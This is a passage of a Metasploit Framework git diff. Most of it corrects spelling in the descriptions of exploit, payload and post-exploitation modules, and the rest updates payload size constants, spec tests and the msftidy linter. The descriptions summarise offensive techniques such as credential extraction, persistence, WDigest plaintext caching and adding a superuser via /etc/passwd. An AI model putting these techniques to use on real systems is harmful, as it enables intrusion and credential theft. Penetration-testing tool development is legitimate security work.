a + In order to exploit this vulnerability, you must specify the name of a valid Windows DOMAIN. It may be possible to satisfy this condition by using - a custom dns and ldap setup, however that method is not covered here. + a custom DNS and LDAP setup, however that method is not covered here. Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator credentials are required to reach the vulnerable code. Windows XP SP1 only diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb index 31e4970250..f5d6921f73 100644 --- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb +++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb @@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the - exploit. If the user supplies credentials in the SMBUser,SMBPass, and SMBDomain options it will use + exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or diff --git a/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb b/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb index 32b3826344..d457562c72 100644 --- a/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb +++ b/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb @@ -22,7 +22,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Z/OS (MVS) Command Shell, Reverse TCP', 'Description' => 'Provide JCL which creates a reverse shell - This implmentation does not include ebcdic character translation, + This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.', 'Author' => 'Bigendian Smalls', diff --git a/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb index cf22b14f24..5156e73ead 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb @@ -17,7 +17,7 @@ module MetasploitModule def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP (via ncat)', - 'Description' => 'Creates an interactive shell via ncat, utilising ssl mode', + 'Description' => 'Creates an interactive shell via ncat, utilizing ssl mode', 'Author' => 'C_Sto', 'License' => MSF_LICENSE, 'Platform' => 'unix', diff --git a/modules/payloads/singles/firefox/exec.rb b/modules/payloads/singles/firefox/exec.rb index bcfe43ccb2..002d07c520 100644 --- a/modules/payloads/singles/firefox/exec.rb +++ b/modules/payloads/singles/firefox/exec.rb @@ -14,7 +14,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Firefox XPCOM Execute Command', 'Description' => %Q| - This module runs a shell command on the target OS withough touching the disk. + This module runs a shell command on the target OS without touching the disk. On Windows, this command will flash the command prompt momentarily. This can be avoided by setting WSCRIPT to true, which drops a jscript "launcher" to disk that hides the prompt. diff --git a/modules/payloads/singles/mainframe/shell_reverse_tcp.rb b/modules/payloads/singles/mainframe/shell_reverse_tcp.rb index 2c6e7eea3a..4ed9636e28 100644 --- a/modules/payloads/singles/mainframe/shell_reverse_tcp.rb +++ b/modules/payloads/singles/mainframe/shell_reverse_tcp.rb @@ -22,7 +22,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Z/OS (MVS) Command Shell, Reverse TCP Inline', 'Description' => 'Listen for a connection and spawn a command shell. - This implmentation does not include ebcdic character translation, + This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.', 'Author' => 'Bigendian Smalls', diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb index e8876c1069..de8c4d1e0e 100644 --- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb @@ -20,7 +20,7 @@ module MetasploitModule 'Name' => 'Windows Command Shell, Hidden Bind TCP Inline', 'Description' => 'Listen for a connection from certain IP and spawn a command shell. The shellcode will reply with a RST packet if the connections is not - comming from the IP defined in AHOST. This way the port will appear + coming from the IP defined in AHOST. This way the port will appear as "closed" helping us to hide the shellcode.', 'Author' => [ diff --git a/modules/payloads/stagers/php/bind_tcp.rb b/modules/payloads/stagers/php/bind_tcp.rb index 7afd06288c..048eff527c 100644 --- a/modules/payloads/stagers/php/bind_tcp.rb +++ b/modules/payloads/stagers/php/bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp' module MetasploitModule - CachedSize = 1188 + CachedSize = 1338 include Msf::Payload::Stager include Msf::Payload::Php::BindTcp diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6.rb b/modules/payloads/stagers/php/bind_tcp_ipv6.rb index 1c37e02e3a..ad9c422279 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp' module MetasploitModule - CachedSize = 1187 + CachedSize = 1337 include Msf::Payload::Stager include Msf::Payload::Php::BindTcp diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb index 38f7db54b4..89f2f2ae3b 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp' module MetasploitModule - CachedSize = 1361 + CachedSize = 1511 include Msf::Payload::Stager include Msf::Payload::Php::BindTcp diff --git a/modules/payloads/stagers/php/bind_tcp_uuid.rb b/modules/payloads/stagers/php/bind_tcp_uuid.rb index 8e705c5c07..290e3b936f 100644 --- a/modules/payloads/stagers/php/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/php/bind_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/bind_tcp' module MetasploitModule - CachedSize = 1362 + CachedSize = 1512 include Msf::Payload::Stager include Msf::Payload::Php::BindTcp diff --git a/modules/payloads/stagers/php/reverse_tcp.rb b/modules/payloads/stagers/php/reverse_tcp.rb index a532fbaee0..3298b70837 100644 --- a/modules/payloads/stagers/php/reverse_tcp.rb +++ b/modules/payloads/stagers/php/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/reverse_tcp' module MetasploitModule - CachedSize = 966 + CachedSize = 1116 include Msf::Payload::Stager include Msf::Payload::Php::ReverseTcp diff --git a/modules/payloads/stagers/php/reverse_tcp_uuid.rb b/modules/payloads/stagers/php/reverse_tcp_uuid.rb index 6316652d79..0d2d5337ed 100644 --- a/modules/payloads/stagers/php/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/php/reverse_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/php/reverse_tcp' module MetasploitModule - CachedSize = 1140 + CachedSize = 1290 include Msf::Payload::Stager include Msf::Payload::Php::ReverseTcp diff --git a/modules/post/linux/busybox/jailbreak.rb b/modules/post/linux/busybox/jailbreak.rb index db4dcdf0ac..af48869d8c 100644 --- a/modules/post/linux/busybox/jailbreak.rb +++ b/modules/post/linux/busybox/jailbreak.rb @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Post super( 'Name' => 'BusyBox Jailbreak ', 'Description' => %q{ - This module will send a set of commands to a open session that is connected to a + This module will send a set of commands to an open session that is connected to a BusyBox limited shell (i.e. a router limited shell). It will try different known tricks to jailbreak the limited shell and get a full BusyBox shell. }, diff --git a/modules/post/linux/dos/xen_420_dos.rb b/modules/post/linux/dos/xen_420_dos.rb index 520d0daf88..0d63e6ac5b 100644 --- a/modules/post/linux/dos/xen_420_dos.rb +++ b/modules/post/linux/dos/xen_420_dos.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post 'Name' => 'Linux DoS Xen 4.2.0 2012-5525', 'Description' => %q( This module causes a hypervisor crash in Xen 4.2.0 when invoked from a - paravirtualised VM, including from dom0. Successfully tested on Debian 7 + paravirtualized VM, including from dom0. Successfully tested on Debian 7 3.2.0-4-amd64 with Xen 4.2.0.), 'References' => [ ['CVE', '2012-5525'] ], 'License' => MSF_LICENSE, diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index dcd44542ef..826aa5f99f 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings, creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these - filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within. + filenames to /etc/passwd, then sending a packet with a privileged user entry contained within. This, and all the other packets, are appended to /etc/passwd. Successful exploitation results in the creation of a new superuser account. diff --git a/modules/post/multi/gather/dns_srv_lookup.rb b/modules/post/multi/gather/dns_srv_lookup.rb index 8652558413..2a66d4a693 100644 --- a/modules/post/multi/gather/dns_srv_lookup.rb +++ b/modules/post/multi/gather/dns_srv_lookup.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Post super( update_info( info, 'Name' => 'Multi Gather DNS Service Record Lookup Scan', 'Description' => %q{ - Enumerates know SRV Records for a given domaon using target host DNS query tool. + Enumerates known SRV Records for a given domain using target host DNS query tool. }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Post register_options( [ - OptString.new('DOMAIN', [true, 'Domain ro perform SRV query against.']) + OptString.new('DOMAIN', [true, 'Domain to perform SRV query against.']) ]) end diff --git a/modules/post/multi/gather/enum_vbox.rb b/modules/post/multi/gather/enum_vbox.rb index 3f1e1ecd9e..d4208723b5 100644 --- a/modules/post/multi/gather/enum_vbox.rb +++ b/modules/post/multi/gather/enum_vbox.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module will attempt to enumerate any VirtualBox VMs on the target machine. Due to the nature of VirtualBox, this module can only enumerate VMs registered - for the current user, thereforce, this module needs to be invoked from a user context. + for the current user, therefore, this module needs to be invoked from a user context. }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], diff --git a/modules/post/multi/gather/thunderbird_creds.rb b/modules/post/multi/gather/thunderbird_creds.rb index 105a618139..d42e996b47 100644 --- a/modules/post/multi/gather/thunderbird_creds.rb +++ b/modules/post/multi/gather/thunderbird_creds.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post the necessary files such as 'signons.sqlite', 'key3.db', and 'cert8.db' for offline decryption with third party tools. - If necessary, you may also set the PARSE optioin to true to parse the sqlite + If necessary, you may also set the PARSE option to true to parse the sqlite file, which contains sensitive information such as the encrypted username/password. However, this feature is not enabled by default, because it requires SQLITE3 gem to be installed on your machine. diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb index 53f2aadcdf..c19958a2ec 100644 --- a/modules/post/multi/manage/system_session.rb +++ b/modules/post/multi/manage/system_session.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Post 'Name' => 'Multi Manage System Remote TCP Shell Session', 'Description' => %q{ This module will create a Reverse TCP Shell on the target system - using the system own scripting enviroments installed on the + using the system's own scripting environments installed on the target. }, 'License' => MSF_LICENSE, @@ -55,7 +55,7 @@ class MetasploitModule < Msf::Post end if not cmd.empty? - print_status("Executing reverse tcp shel to #{lhost} on port #{lport}") + print_status("Executing reverse tcp shell to #{lhost} on port #{lport}") cmd_exec("(#{cmd} &)") end end diff --git a/modules/post/osx/gather/enum_chicken_vnc_profile.rb b/modules/post/osx/gather/enum_chicken_vnc_profile.rb index 54694a1dc8..fc7a2f84de 100644 --- a/modules/post/osx/gather/enum_chicken_vnc_profile.rb +++ b/modules/post/osx/gather/enum_chicken_vnc_profile.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module will download the "Chicken of the VNC" client application's profile file, which is used to store other VNC servers' information such - as as the IP and password. + as the IP and password. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], diff --git a/modules/post/osx/gather/enum_keychain.rb b/modules/post/osx/gather/enum_keychain.rb index 2cae840a30..a612592da9 100644 --- a/modules/post/osx/gather/enum_keychain.rb +++ b/modules/post/osx/gather/enum_keychain.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Post This module presents a way to quickly go through the current user's keychains and collect data such as email accounts, servers, and other services. Please note: when using the GETPASS and GETPASS_AUTO_ACCEPT option, the user may see an authentication - alert flash briefly on their screen that gets dismissed by a programatically triggered click. + alert flash briefly on their screen that gets dismissed by a programmatically triggered click. }, 'License' => MSF_LICENSE, 'Author' => [ 'ipwnstuff ', 'joev' ], diff --git a/modules/post/osx/gather/safari_lastsession.rb b/modules/post/osx/gather/safari_lastsession.rb index 2a8b233aa9..d60051d58f 100644 --- a/modules/post/osx/gather/safari_lastsession.rb +++ b/modules/post/osx/gather/safari_lastsession.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Post to find the credential for Gmail. The Gmail's last session state may contain the user's credential if his/her first login attempt failed (likely due to a typo), and then the page got refreshed or another login attempt was made. This also means - the stolen credential might contains typos. + the stolen credential might contain typos. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], diff --git a/modules/post/solaris/gather/checkvm.rb b/modules/post/solaris/gather/checkvm.rb index 777e80720c..4e690f439d 100644 --- a/modules/post/solaris/gather/checkvm.rb +++ b/modules/post/solaris/gather/checkvm.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module attempts to determine whether the system is running inside of a virtual environment and if so, which one. This - module supports detectoin of Solaris Zone, VMWare, VirtualBox, Xen, + module supports detection of Solaris Zone, VMWare, VirtualBox, Xen, and QEMU/KVM.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], diff --git a/modules/post/windows/gather/checkvm.rb b/modules/post/windows/gather/checkvm.rb index fc9151819d..8f2decf674 100644 --- a/modules/post/windows/gather/checkvm.rb +++ b/modules/post/windows/gather/checkvm.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module attempts to determine whether the system is running inside of a virtual environment and if so, which one. This - module supports detectoin of Hyper-V, VMWare, Virtual PC, + module supports detection of Hyper-V, VMWare, Virtual PC, VirtualBox, Xen, and QEMU. }, 'License' => MSF_LICENSE, diff --git a/modules/post/windows/gather/credentials/flashfxp.rb b/modules/post/windows/gather/credentials/flashfxp.rb index 18c47ac40b..ce33d25421 100644 --- a/modules/post/windows/gather/credentials/flashfxp.rb +++ b/modules/post/windows/gather/credentials/flashfxp.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post super(update_info(info, 'Name' => 'Windows Gather FlashFXP Saved Password Extraction', 'Description' => %q{ - This module extracts weakly encrypted saved FTP Passwords from FlashFXP. It + This module extracts weakly encrypted saved FTP Passwords from FlashFXP. It finds saved FTP connections in the Sites.dat file. }, 'License' => MSF_LICENSE, 'Author' => [ 'theLightCosine'], diff --git a/modules/post/windows/gather/enum_domain_users.rb b/modules/post/windows/gather/enum_domain_users.rb index abaa9efc3e..4b3c8646eb 100644 --- a/modules/post/windows/gather/enum_domain_users.rb +++ b/modules/post/windows/gather/enum_domain_users.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Post 'Name' => 'Windows Gather Enumerate Active Domain Users', 'Description' => %q{ This module will enumerate computers included in the primary Domain and attempt - to list all locations the targeted user has sessions on. If a the HOST option is specified + to list all locations the targeted user has sessions on. If the HOST option is specified the module will target only that host. If the HOST is specified and USER is set to nil, all users logged into that host will be returned.' }, diff --git a/modules/post/windows/gather/memory_grep.rb b/modules/post/windows/gather/memory_grep.rb index 5ea88c3426..055b7e423d 100644 --- a/modules/post/windows/gather/memory_grep.rb +++ b/modules/post/windows/gather/memory_grep.rb @@ -9,7 +9,7 @@ class MetasploitModule < Msf::Post super( update_info(info, 'Name' => 'Windows Gather Process Memory Grep', 'Description' => %q{ - This module allows for searching the memory space of a proccess for potentially + This module allows for searching the memory space of a process for potentially sensitive data. Please note: When the HEAP option is enabled, the module will have to migrate to the process you are grepping, and will not migrate back automatically. This means that if the user terminates the application after using this module, you diff --git a/modules/post/windows/manage/add_user_domain.rb b/modules/post/windows/manage/add_user_domain.rb index ca66a3368e..14e7ca288a 100644 --- a/modules/post/windows/manage/add_user_domain.rb +++ b/modules/post/windows/manage/add_user_domain.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module adds a user to the Domain and/or to a Domain group. It will check if sufficient privileges are present for certain actions and run - getprivs for system. If you elevated privs to system,the + getprivs for system. If you elevated privs to system, the SeAssignPrimaryTokenPrivilege will not be assigned. You need to migrate to a process that is running as system. If you don't have privs, this script exits. diff --git a/modules/post/windows/manage/forward_pageant.rb b/modules/post/windows/manage/forward_pageant.rb index 4c60ac8ad8..acd23d3410 100644 --- a/modules/post/windows/manage/forward_pageant.rb +++ b/modules/post/windows/manage/forward_pageant.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post This module forwards SSH agent requests from a local socket to a remote Pageant instance. If a target Windows machine is compromised and is running Pageant, this will allow the attacker to run normal OpenSSH commands (e.g. ssh-add -l) against the Pageant host which are - tunnelled through the meterpreter session. This could therefore be used to authenticate + tunneled through the meterpreter session. This could therefore be used to authenticate with a remote host using a private key which is loaded into a remote user's Pageant instance, without ever having knowledge of the private key itself. diff --git a/modules/post/windows/manage/persistence_exe.rb b/modules/post/windows/manage/persistence_exe.rb index 605e5391a8..76ef787818 100644 --- a/modules/post/windows/manage/persistence_exe.rb +++ b/modules/post/windows/manage/persistence_exe.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Post super(update_info(info, 'Name' => 'Windows Manage Persistent EXE Payload Installer', 'Description' => %q( - This Module will upload a executable to a remote host and make it Persistent. + This Module will upload an executable to a remote host and make it Persistent. It can be installed as USER, SYSTEM, or SERVICE. USER will start on user login, SYSTEM will start on system boot but requires privs. SERVICE will create a new service which will start the payload. Again requires privs. diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index 3b112f5d83..3c918bf6f1 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Post super( update_info( info, 'Name' => 'Windows Manage Privilege Based Process Migration ', 'Description' => %q{ This module will migrate a Meterpreter session based on session privileges. - It will do everything it can to migrate, including spawing a new User level process. + It will do everything it can to migrate, including spawning a new User level process. For sessions with Admin rights: It will try to migrate into a System level process in the following order: ANAME (if specified), services.exe, wininit.exe, svchost.exe, lsm.exe, lsass.exe, and winlogon.exe. If all these fail and NOFAIL is set to true, it will fall back to User level migration. For sessions with User level rights: diff --git a/modules/post/windows/manage/run_as.rb b/modules/post/windows/manage/run_as.rb index ac31720386..55793f962c 100644 --- a/modules/post/windows/manage/run_as.rb +++ b/modules/post/windows/manage/run_as.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post This module will login with the specified username/password and execute the supplied command as a hidden process. Output is not returned by default, by setting CMDOUT to false output will be redirected to a temp file and read back in to - display.By setting advanced option SETPASS to true, it will reset the users + display. By setting advanced option SETPASS to true, it will reset the users password and then execute the command. ), 'License' => MSF_LICENSE, diff --git a/modules/post/windows/manage/vss_set_storage.rb b/modules/post/windows/manage/vss_set_storage.rb index 4fafdf6d54..84227f6225 100644 --- a/modules/post/windows/manage/vss_set_storage.rb +++ b/modules/post/windows/manage/vss_set_storage.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Post super(update_info(info, 'Name' => "Windows Manage Set Shadow Copy Storage Space", 'Description' => %q{ - This module will attempt to change the ammount of space + This module will attempt to change the amount of space for volume shadow copy storage. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. diff --git a/modules/post/windows/manage/wdigest_caching.rb b/modules/post/windows/manage/wdigest_caching.rb index eac3ea9815..85de72a541 100644 --- a/modules/post/windows/manage/wdigest_caching.rb +++ b/modules/post/windows/manage/wdigest_caching.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key. - Any subsequest logins will allow mimikatz to recover the plain text passwords from the system's memory. + Any subsequent logins will allow mimikatz to recover the plain text passwords from the system's memory. }, 'License' => MSF_LICENSE, 'Author' => [ 'Kostas Lintovois '], diff --git a/modules/post/windows/recon/computer_browser_discovery.rb b/modules/post/windows/recon/computer_browser_discovery.rb index b3b7d80850..d40a25a614 100644 --- a/modules/post/windows/recon/computer_browser_discovery.rb +++ b/modules/post/windows/recon/computer_browser_discovery.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module uses railgun to discover hostnames and IPs on the network. LTYPE should be set to one of the following values: WK (all workstations), SVR (all servers), SQL (all SQL servers), DC (all Domain Controllers), DCBKUP (all Domain Backup Servers), - NOVELL (all Novell servers), PRINTSVR (all Print Que servers), MASTERBROWSER (all Master Browswers), + NOVELL (all Novell servers), PRINTSVR (all Print Que servers), MASTERBROWSER (all Master Browsers), WINDOWS (all Windows hosts), or UNIX (all Unix hosts). }, 'License' => MSF_LICENSE, diff --git a/modules/post/windows/wlan/wlan_profile.rb b/modules/post/windows/wlan/wlan_profile.rb index c99764869c..fd87fb713e 100644 --- a/modules/post/windows/wlan/wlan_profile.rb +++ b/modules/post/windows/wlan/wlan_profile.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Post 'Name' => 'Windows Gather Wireless Profile', 'Description' => %q{ This module extracts saved Wireless LAN profiles. It will also try to decrypt - the network key material. Behaviour is slightly different between OS versions + the network key material. Behavior is slightly different between OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived key. }, diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 687dace6fa..69578c7a31 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -2929,6 +2929,17 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'windows/meterpreter/reverse_ipv6_tcp' end + context 'windows/meterpreter/reverse_named_pipe' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/windows/reverse_named_pipe', + 'stages/windows/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'windows/meterpreter/reverse_named_pipe' + end + context 'windows/meterpreter/reverse_nonx_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -3888,6 +3899,17 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'windows/x64/meterpreter/reverse_https' end + context 'windows/x64/meterpreter/reverse_named_pipe' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/windows/x64/reverse_named_pipe', + 'stages/windows/x64/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'windows/x64/meterpreter/reverse_named_pipe' + end + context 'windows/x64/meterpreter/reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb index 2cf50f9f82..11691c7bd1 100755 --- a/tools/dev/msftidy.rb +++ b/tools/dev/msftidy.rb @@ -43,9 +43,10 @@ end class Msftidy # Status codes - OK = 0x00 - WARNINGS = 0x10 - ERRORS = 0x20 + OK = 0 + INFO = 1 + WARNING = 2 + ERROR = 3 # Some compiles regexes REGEX_MSF_EXPLOIT = / \< Msf::Exploit/ @@ -73,7 +74,7 @@ class Msftidy # error. def warn(txt, line=0) line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'WARNING'.yellow}] #{cleanup_text(txt)}" - @status == ERRORS ? @status = ERRORS : @status = WARNINGS + @status += WARNING end # @@ -85,7 +86,7 @@ class Msftidy def error(txt, line=0) line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'ERROR'.red}] #{cleanup_text(txt)}" - @status = ERRORS + @status += ERROR end # Currently unused, but some day msftidy will fix errors for you. @@ -101,6 +102,7 @@ class Msftidy return if SUPPRESS_INFO_MESSAGES line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'INFO'.cyan}] #{cleanup_text(txt)}" + @status += INFO end ##